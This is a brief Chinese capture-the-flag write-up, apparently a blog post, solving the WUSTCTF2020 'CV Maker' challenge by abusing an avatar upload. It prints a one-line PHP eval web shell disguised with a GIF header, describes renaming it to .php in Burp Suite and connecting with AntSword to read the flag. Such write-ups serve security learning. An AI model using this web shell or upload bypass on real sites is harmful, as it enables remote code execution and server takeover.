[WUSTCTF2020]CV Maker

打开环境

yvtuYG6gjNYy92RzX2vTX9NU8L2H-1kXH5izum-d7RA

注册了账号登陆，发现有上传头像的地方，尝试上传文件

Lt1u4UYVTexhRZ7mpQzTjW4wufK6J0RvgKIVJfp1ckU

可以上传图片马

GIF89a
<script language='php'> @eval($_POST['shell']);</script>

BP里抓包改为php，得到上传成功路径http://1d2ee33c-dfe2-49ec-88c3-d3305f7bd2f3.node5.buuoj.cn:81/uploads/d41d8cd98f00b204e9800998ecf8427e.php

L5urwvjjI6vVdNmkhUdeXabsFGkZgv6nzR4prCFw5ek

使用蚁剑连接

HfMSsRWxYMlsaVtNyVXKi4FODJS7afPTB4kq0fGuPK8

6jXwzvwbY5yGmpcle3TI2uSgondma-5pZQ0TKz3v1DE

根目录下发现flag文件，打开即可得到flag

tVmsjJY9os5X9cpkwXDjRbqywweCcujAc1vRokeXJFY

posted on 2024-05-04 16:01 跳河离去的鱼阅读(1) 评论(0) 编辑收藏举报

刷新页面返回顶部

fishjumpriver